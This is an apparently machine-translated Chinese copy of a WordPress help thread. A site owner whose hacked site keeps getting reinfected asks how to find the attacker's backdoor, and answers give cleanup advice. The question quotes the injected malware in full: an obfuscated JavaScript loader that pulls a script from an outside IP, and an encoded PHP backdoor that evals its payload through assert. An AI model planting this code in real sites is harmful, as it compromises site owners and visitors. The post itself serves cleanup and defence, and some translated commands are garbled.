如何找到黑客的后门

时间:2017-02-11 作者:Tamil Selvan C

今天,我们客户的一个WordPress网站被黑客入侵,该网站由亚马逊aws ubuntu托管。

问题是https://blog.sucuri.net/2016/01/jquery-pastebin-replacement.html

js代码被注入所有js中

var _0xaae8=["","\\x6A\\x6F\\x69\\x6E","\\x72\\x65\\x76\\x65\\x72\\x73\\x65","\\x73\\x70\\x6C\\x69\\x74","\\x3E\\x74\\x70\\x69\\x72\\x63\\x73\\x2F\\x3C\\x3E\\x22\\x73\\x6A\\x2E\\x79\\x72\\x65\\x75\\x71\\x6A\\x2F\\x38\\x37\\x2E\\x36\\x31\\x31\\x2E\\x39\\x34\\x32\\x2E\\x34\\x33\\x31\\x2F\\x2F\\x3A\\x70\\x74\\x74\\x68\\x22\\x3D\\x63\\x72\\x73\\x20\\x74\\x70\\x69\\x72\\x63\\x73\\x3C","\\x77\\x72\\x69\\x74\\x65"];document[_0xaae85](_0xaae84[_0xaae83](_0xaae80)[_0xaae82]()[_0xaae81](_0xaae80))
并且在index.php

//###====###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.\'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTIlpz9lK3WypT9lqTyhMluSK0SZGPx7DTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvk0paIyXGgNMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFNzWvOyoKO0rFtxnJW2XFxtrlNxnJW2VQ0tWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqBlNtMJAbolNxnJW2B30tMJkmMJyzVPuyoKO0rFtxnJW2XFxtrjccMvNbp3Elp3ElXPEsH0IFIxIFJlWVISEDK0uCH1DvKFjtVwRlAl4jVvxcrlEhLJ1yVQ0tWS9GEIWJEIWoVyASHyMSHy9OEREFVy07sJIfp2I7WT5uoJHtCFNxK1ASHyMSHyfvFSEHHS9VG1AHVy07sDbxqKAypzRtCFOcp3AyqPtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cC3IloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cBvVvBjbxqKWfVQ0tVzu0qUN6Yl9vLKAbp2thpaHiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvHxIAG1ESK0SRESVvKFxhVvMxCFVhqKWfMJ5wo2EyXPEhLJ1yYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv4xqKAypzRhVvMcCGRznQ0vYz1xAFtvBQMxZGL3ZQH4LGyuLwN5LmWxAGMvZmL4MQZlMwOyZTHkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9QG05BEHAHIRyAEH9IIPjtAFx7VTA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9HFH1SG1IHYPN1XGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWTyvqvN9VTA1pzksMKuyLltxL2tcBlEcozMiVQ0tL3IloS9aMKEcozMiXPEwnPx7nJLtXPEcozMiJlWbqUEjK2AiMTHvKFR9ZwNjXKfxnJW2CFVvB30XL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvtuMJ1jqUxbWS9DG1AHJlWjVy0cVPLzVT1xAFugMQHbWS9DG1AHJlWjVy0cXFN9CFNvZ2MvAQqvBTLmZmyvZmuzZ2VkLJR1BGEuMwD0AGN0ZTHvXFO7VROyqzSfXUA0pzyjp2kup2uypltxK1OCH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwfXsFO9"));\'); $strings($light);
//###====###
以下步骤:

我在本地下载所有js(使用命令zip-r js\\u files.zipwp-content-I\'*.js\'),并使用SubliveText替换恶意代码并上载此代码

Order Deny,Allow
Deny from 134.249.116.78
更改文件夹和文件的权限(使用http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/hosting-wordpress.html)

My Question is:

完成所有这些之后,仍然会注入代码。我是如何找到该网站黑客的后门的。请引导我。

3 个回复
SO网友:cjbj

通过步骤1和2,您只需消除感染的症状,而不是感染本身。阻止访问和更改权限(步骤3和4)会对系统的外部方法产生影响。但是感染已经在你的网站里了。因此,通过这些步骤,您无法消除感染。

感染可能发生在任何地方:在你的主题中,隐藏在数据库中的某个插件,在WordPress核心中,你可以命名它。最简单的方法是彻底删除站点并安装备份。否则,你必须go through a lengthy process.

SO网友:吉 宁

后门很可能位于主题的功能中。php文件。仔细看看,我相信你会找到答案的。

WordPress核心很少受到损害。这一定是由恶意主题引起的。

SO网友:Rick Hellewell

如果您正在查找黑客的来源,则必须深入访问日志。这不是一件容易的事。

我将执行以下基本步骤

将所有内容备份到本地计算机,通过仪表板/更新页面重新安装WP重新加载所有主题(手动或删除主题并重新安装)。手动下载到本地计算机,然后上载到主题文件夹(可能在删除主题文件夹中的文件后),可能会保持所有设置,对所有插件执行相同的操作(手动或停用删除重新安装);同样,手动过程可能会保留插件设置,检查所有文件夹中的任何额外文件(更新的文件将具有相同的时间戳,因此请查找重新安装日期/时间以外的文件)。删除任何“额外”文件您的数据库中可能有一些损坏,因此您可以恢复数据库的备份副本(您已经进行了备份,对吗?)。

某些主机将恢复完整的站点备份;他们可能会保留几个最近的备份。这将破坏任何更新的内容/等,因此您可能希望重新安装WP、主题和插件。某些主机可能具有可以安装的数据库的备份副本。

祝你好运

Added这些并不是我使用的所有步骤;我的流程如下:https://securitydawg.com/recovering-from-a-hacked-wordpress-site/ . 甚至核心文件也可能遭到破坏——我在一个仍在工作的站点上看到过这种情况(多个附加域,一些是WP,一些不是,这使它变得更加困难)。

标签: hacked   小码农  

相关推荐

How was my WP site hacked

我的网站,http://www.cancer-study.com, 已被黑客攻击,我无法登录到wp管理员。你能说一下它是如何被黑客入侵的吗?我能做些什么来修复损坏?我可以访问主机。